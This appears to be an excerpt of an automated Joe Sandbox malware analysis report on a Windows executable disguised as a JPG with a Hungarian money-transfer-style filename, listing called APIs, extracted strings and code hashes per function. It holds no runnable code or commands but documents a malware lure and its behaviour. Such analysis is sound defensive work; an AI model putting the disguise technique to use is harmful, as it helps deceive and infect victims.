                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \
                                                                                                          • API String ID: 4104443479-2967466578
                                                                                                          • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                          • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                                          • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                          • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                                          APIs
                                                                                                          • _wcslen.LIBCMT ref: 00466825
                                                                                                          • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CrackInternet_wcslen
                                                                                                          • String ID: |
                                                                                                          • API String ID: 596671847-2343686810
                                                                                                          • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                          • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                                          • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                          • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: '
                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                          • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                          • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                          • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                          • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                          APIs
                                                                                                          • _strlen.LIBCMT ref: 0040F858
                                                                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                          • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_sprintf_strlen
                                                                                                          • String ID: %02X
                                                                                                          • API String ID: 1921645428-436463671
                                                                                                          • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                          • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                          • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                          • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: Combobox
                                                                                                          • API String ID: 3850602802-2096851135
                                                                                                          • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                          • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                          • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                          • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                          APIs
                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                                          • String ID: edit
                                                                                                          • API String ID: 2978978980-2167791130
                                                                                                          • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                          • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                          • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                          • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                          APIs
                                                                                                          • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                          • String ID: @
                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                          • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                          • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                          • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                          • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: htonsinet_addr
                                                                                                          • String ID: 255.255.255.255
                                                                                                          • API String ID: 3832099526-2422070025
                                                                                                          • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                          • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                          • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                          • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                          APIs
                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InternetOpen
                                                                                                          • String ID: <local>
                                                                                                          • API String ID: 2038078732-4266983199
                                                                                                          • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                          • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                          • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                          • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: u,D
                                                                                                          • API String ID: 4104443479-3858472334
                                                                                                          • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                          • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                                                          • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                          • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                                          APIs
                                                                                                          • _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • _memmove.LIBCMT ref: 00401B57
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                          • String ID: @EXITCODE
                                                                                                          • API String ID: 2734553683-3436989551
                                                                                                          • Opcode ID: 6671e83096f05fbf7ed832023dfd6df0aed7d84870a55488e32c5eab381b68c1
                                                                                                          • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                          • Opcode Fuzzy Hash: 6671e83096f05fbf7ed832023dfd6df0aed7d84870a55488e32c5eab381b68c1
                                                                                                          • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • wsprintfW.USER32 ref: 0045612A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend_mallocwsprintf
                                                                                                          • String ID: %d/%02d/%02d
                                                                                                          • API String ID: 1262938277-328681919
                                                                                                          • Opcode ID: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
                                                                                                          • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                          • Opcode Fuzzy Hash: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
                                                                                                          • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                                          APIs
                                                                                                          • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                          • InternetCloseHandle.WININET ref: 00442668
                                                                                                            • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                          • String ID: aeB
                                                                                                          • API String ID: 857135153-906807131
                                                                                                          • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                          • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                          • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                          • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • ^B, xrefs: 00433248
                                                                                                          • C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, xrefs: 0043324B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsncpy
                                                                                                          • String ID: ^B$C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                                                                                                          • API String ID: 1735881322-2521316454
                                                                                                          • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                                                          • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                                                                          • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                                                          • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                                                                          APIs
                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                          • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                          • String ID: Shell_TrayWnd
